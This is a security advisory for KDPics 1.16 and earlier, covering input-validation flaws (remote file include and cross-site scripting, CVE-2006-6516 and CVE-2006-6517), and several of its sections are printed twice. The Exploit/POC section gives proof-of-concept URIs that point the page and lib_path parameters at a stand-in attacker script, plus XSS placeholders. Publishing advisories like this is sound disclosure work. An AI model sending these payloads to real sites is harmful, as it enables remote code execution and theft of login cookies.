KDPics Multiple Input Validation Vulnerabilities
BID:21515
Info
KDPics Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 21515 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-6516 CVE-2006-6517 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 09 2006 12:00AM |
| Updated: | Aug 09 2010 04:15PM |
| Credit: | Mr_KaLiMaN is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
KDPics KDPics 1.16 KDPics KDPics 1.11 |
| Not Vulnerable: | |
Discussion
KDPics Multiple Input Validation Vulnerabilities
KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize user-supplied input.
A successful exploit may allow unauthorized users to view files, to execute arbitrary scripts within the context of the browser, and to steal cookie-based authentication credentials. Other attacks are also possible.
KDPics 1.16 and prior versions are vulnerable.
KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize user-supplied input.
A successful exploit may allow unauthorized users to view files, to execute arbitrary scripts within the context of the browser, and to steal cookie-based authentication credentials. Other attacks are also possible.
KDPics 1.16 and prior versions are vulnerable.
Exploit / POC
KDPics Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
Remote file-include vulnerability:
http://www.example.com[/[kdpics_path]/index.php3?page=http://evil_script.txt?
http://www.example.com[/[kdpics_path]/authenticate.inc.php3?lib_path=http://evil_script.txt?
http://www.example.com/[kdpics_path]/lib/exifer/exif.php?lib_path=http://evil_script.txt?
Cross-site scripting vulnerability:
http://www.example.com/[kdpics_path]/index.php3?page=galeries&categories=[XSS]
http://www.example.com/[kdpics_path]/galeries.inc.php3?categories=[XSS]
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
Remote file-include vulnerability:
http://www.example.com[/[kdpics_path]/index.php3?page=http://evil_script.txt?
http://www.example.com[/[kdpics_path]/authenticate.inc.php3?lib_path=http://evil_script.txt?
http://www.example.com/[kdpics_path]/lib/exifer/exif.php?lib_path=http://evil_script.txt?
Cross-site scripting vulnerability:
http://www.example.com/[kdpics_path]/index.php3?page=galeries&categories=[XSS]
http://www.example.com/[kdpics_path]/galeries.inc.php3?categories=[XSS]
Solution / Fix
KDPics Multiple Input Validation Vulnerabilities
Solution:
The vendor has released an update to address this issue. Please see the references for more information.
Solution:
The vendor has released an update to address this issue. Please see the references for more information.
References
KDPics Multiple Input Validation Vulnerabilities
References:
References:
- KDPics Homepage (KDPics)
- KDPics Release Notes (KDPics)
- KDPics Multiple Vulnerabities ( Mr_KaLiMaN)